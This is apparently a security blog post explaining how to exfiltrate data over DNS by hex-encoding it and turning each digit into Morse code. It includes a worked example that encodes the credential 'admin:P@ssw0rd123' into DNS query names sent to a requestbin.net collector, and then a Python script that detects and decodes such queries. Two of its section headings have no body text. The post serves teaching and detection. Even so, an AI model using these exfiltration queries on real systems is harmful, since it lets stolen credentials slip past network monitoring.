Data Exfiltration over DNS Queries via Morse Code

What is Data Exfiltration?

  • Bulk Data Exfiltration: transfers large volumes of data, some of it random and useless to the attacker. This method is mostly employed by malware or ransomware. Most probably, after the data is extracted, the target system will be encrypted.
  • Specific Data Exfiltration: attackers search for an exact file or piece of information on the compromised machine. Almost every time, the attack’s main purpose is getting their hands on that piece of information.

Why exfiltrate over DNS?

Why NOT exfiltrate over DNS?

How to exfiltrate over DNS via Morse Code

(Source: dcoder.fr)
0 = 11111
1 = 01111
2 = 00111
3 = 00011
4 = 00001
5 = 00000
6 = 10000
7 = 11000
8 = 11100
9 = 11110
A = 01
B = 1000
C = 1010
D = 100
E = 0
F = 0010
Delimiter = .
61646d696e3a50407373773072643132330a
61646d696e 
3a50407373
7730726431
32330a
10000.01111.10000.00001.10000.100.10000.11110.10000.0
00011.01.00000.11111.00001.11111.11000.00011.11000.00011
11000.11000.00011.11111.11000.00111.10000.00001.00011.01111
00011.00111.00011.00011.11111.01
10000.01111.10000.00001.10000.100.10000.11110.10000.0.8b2d8cddf0d118c84688.d.requestbin.net
00011.01.00000.11111.00001.11111.11000.00011.11000.00011.8b2d8cddf0d118c84688.d.requestbin.net
11000.11000.00011.11111.11000.00111.10000.00001.00011.01111.8b2d8cddf0d118c84688.d.requestbin.net
00011.00111.00011.00011.11111.01.8b2d8cddf0d118c84688.d.requestbin.net
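
Seen from the detection side, query names built this way are easy to recognise and to decode back. The Python below is an added example, not code from the original article: it flags names whose leading labels all appear in the Morse table, groups them by parent domain, and rebuilds the bytes they carried. `MIN_LABELS`, the function names and the two benign query names are assumptions made for the example.

```python
from collections import defaultdict

# Table from this page: each DNS label is one hex digit in Morse (0 = dot, 1 = dash).
MORSE_TO_HEX = {
    "11111": "0", "01111": "1", "00111": "2", "00011": "3", "00001": "4",
    "00000": "5", "10000": "6", "11000": "7", "11100": "8", "11110": "9",
    "01": "a", "1000": "b", "1010": "c", "100": "d", "0": "e", "0010": "f",
}
MIN_LABELS = 5  # assumed threshold; keeps short reverse-lookup names from matching


def morse_prefix(qname):
    """Split a query name into (hex digits from leading Morse labels, parent domain)."""
    labels = qname.rstrip(".").lower().split(".")
    digits = []
    for label in labels:
        if label not in MORSE_TO_HEX:
            break
        digits.append(MORSE_TO_HEX[label])
    return "".join(digits), ".".join(labels[len(digits):])


def analyze(qnames):
    """Return {parent domain: reassembled bytes} for names that look Morse-encoded."""
    streams = defaultdict(str)
    for qname in qnames:
        digits, parent = morse_prefix(qname)
        if len(digits) >= MIN_LABELS:
            streams[parent] += digits
    # An odd digit count means the capture is incomplete; drop the trailing nibble.
    return {p: bytes.fromhex(h[: len(h) // 2 * 2]) for p, h in streams.items()}


# Query names in log order: the four from this page plus two constructed benign names.
BASE = "8b2d8cddf0d118c84688.d.requestbin.net"
SAMPLE_QUERIES = [
    "www.example.com",
    "10000.01111.10000.00001.10000.100.10000.11110.10000.0." + BASE,
    "00011.01.00000.11111.00001.11111.11000.00011.11000.00011." + BASE,
    "0.0.0.10.in-addr.arpa",
    "11000.11000.00011.11111.11000.00111.10000.00001.00011.01111." + BASE,
    "00011.00111.00011.00011.11111.01." + BASE,
]

if __name__ == "__main__":
    for parent, payload in analyze(SAMPLE_QUERIES).items():
        print(f"{parent}: {len(payload)} bytes recovered: {payload!r}")
```

The reverse-lookup name starts with three labels that happen to be valid Morse (`0.0.0`), which is why a minimum label count is needed before a name is flagged.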

Cristian Cornea

🇷🇴 Cyber Security Enthusiast, Freelancer, Researcher, Bug Bounty Hunter and InfoSec Writer | OSEP | OSWE | OSCP | CEH | CPTC | PenTest+ | eWPT | ECIH